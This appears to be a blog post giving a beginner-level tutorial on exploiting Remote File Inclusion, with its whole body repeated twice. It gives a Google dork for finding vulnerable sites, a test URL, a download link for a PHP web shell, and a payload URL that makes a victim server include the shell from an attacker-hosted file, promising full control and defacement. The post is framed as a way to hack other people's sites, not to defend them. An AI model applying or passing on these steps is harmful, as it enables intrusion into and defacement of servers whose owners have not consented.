Remote File Inclusion ( RFI ) allows an attacker to upload his file on a website server using a script. RFI is a common vulnerability found in many websites. Using RFI you can literally deface a websites and get complete access to the server. In this tutorial, i'll try to make it as simple as possible.. (Noob Friendly)
1. Searching for RFI vulnerability
The valnerability is ussually found in websites that have a url navigation that is similar to;
This can be found by the use of google dorks.. e.g inurl:index.php?page=
2. Testing for RFI vulnerability
After targeting a website, you need to make sure that its realy vulnerable to this type of attack by testing using:
Press enter and if the google home page appears instead of the victim's website, then it is vulnerable to RFI
3. Gaining Access to the server
Now you need to execute your own script on the victim's webserver with the help of a shell. Shells are scripts that allow a hacker to view directories of a server, viewing files, deleting files and letting you run commands.
DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php
Now upload the shell to any webhost (hacker's website) and get the url of that
e.g www.hackerwebsite.com/shell.txt
You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as ''shell.php'', its going to execute on the hacker's website instead of the victim's website,. get my point?
Now you need to hook up your victim's server to your shell by replacing the google url with your shell url so that it looks like this;
www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt
Hit enter!!! and its game over.... you have complete access to the victim's server and you can do anything with it... :P
The above image shows how your shell window would look like after you have successfully hacked into a website.
1. Searching for RFI vulnerability
The valnerability is ussually found in websites that have a url navigation that is similar to;
- www.victimwebsite.com/index.php?page=something
This can be found by the use of google dorks.. e.g inurl:index.php?page=
2. Testing for RFI vulnerability
After targeting a website, you need to make sure that its realy vulnerable to this type of attack by testing using:
- www.victimwebsite.com/index.php?page=http://www.google.com/?
Press enter and if the google home page appears instead of the victim's website, then it is vulnerable to RFI
3. Gaining Access to the server
Now you need to execute your own script on the victim's webserver with the help of a shell. Shells are scripts that allow a hacker to view directories of a server, viewing files, deleting files and letting you run commands.
DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php
Now upload the shell to any webhost (hacker's website) and get the url of that
e.g www.hackerwebsite.com/shell.txt
You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as ''shell.php'', its going to execute on the hacker's website instead of the victim's website,. get my point?
Now you need to hook up your victim's server to your shell by replacing the google url with your shell url so that it looks like this;
www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt
Hit enter!!! and its game over.... you have complete access to the victim's server and you can do anything with it... :P
The above image shows how your shell window would look like after you have successfully hacked into a website.
0 comments:
Post a Comment